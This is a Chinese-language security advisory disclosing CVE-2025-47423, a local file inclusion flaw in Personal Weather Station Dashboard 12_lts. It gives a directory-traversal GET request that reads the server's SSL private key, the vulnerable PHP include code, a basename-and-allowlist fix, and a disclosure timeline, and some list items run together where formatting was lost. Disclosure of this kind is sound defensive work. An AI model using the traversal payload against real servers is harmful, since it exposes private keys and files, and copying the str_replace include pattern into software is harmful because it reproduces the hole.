发现者: Matthew Eagle
状态: 公开披露
报告日期: 2025-05-05
CVE ID: CVE-2025-47423
Personal Weather Station Dashboard 版本 12_lts 中存在一个本地文件包含(LFI)漏洞,允许未经身份验证的远程攻击者读取服务器上的任意文件。利用此漏洞可访问包括私有 SSL 密钥在内的敏感文件,从而可能危及 HTTPS 连接的机密性和完整性。
/others/_test.phptest(通过 GET)此漏洞允许远程攻击者:
server.key)CVSS:5.8 中危
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com
响应:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);
str_replace 不足以阻止目录遍历。
basename() 清理输入,并对照允许的文件进行校验$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';
if (!in_array($script, $allowed_tests)) {
die("Invalid test file.");
}
include(__DIR__ . '/scripts/' . $script);
| 日期 | 事件 |
|---|---|
| 2025-05-05 | 向 PWS Dashboard 版主报告漏洞 |
| 2025-05-06 | 已收到确认并开始测试 |
| 2025-05-07 | 通过 MITRE 预留 CVE-2025-47423 |
| 待定 | 公开补丁和 CVE 收录待定 |
如果您正在运行 Personal Weather Station Dashboard 12_lts,您应该:
_test.php该漏洞由 Matthew Eagle 发现并负责任地披露
联系方式:[email protected]
本次披露遵循负责任披露准则进行协调。本文档仅供教育和防御目的发布。